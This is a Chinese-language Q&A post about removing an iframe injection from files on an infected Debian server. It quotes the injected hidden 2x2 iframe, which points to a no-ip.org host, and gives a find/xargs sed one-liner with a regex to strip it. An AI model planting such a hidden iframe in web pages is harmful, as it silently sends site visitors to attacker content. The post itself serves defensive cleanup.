Debian,搜索并替换 iframe 注入

Debian,搜索并替换 iframe 注入

我们正在运行 Debian 服务器并且有恶意软件或某些东西正在进行代码注入。

我知道如何搜索和替换该字符串:

<iframe src="http://ingvar2000.no-ip.org/jc/rss.php" width="2" height="2" frameborder="0"></iframe>

我这样做:

find /home -type f | xargs sed -i 's$<iframe src="http://ingvar2000.no-ip.org/jc/rss.php" width="2" height="2" frameborder="0"></iframe>$ $g'

我的问题是 URLhttp://ingvar2000.no-ip.org/jc/rss.php从一个文件变为另一个文件,因此我该如何搜索和替换:

<iframe src="ANY STRING HERE" width="2" height="2" frameborder="0"></iframe>

因为宽度、高度和框架边框总是相同的。

答案1

使用

find /home -type f | xargs sed -i 's$<iframe src="[^"]*" width="2" height="2" frameborder="0"></iframe>$ $g'

这里[^"]*表示 0 个或更多除 之外的任何字符"

相关内容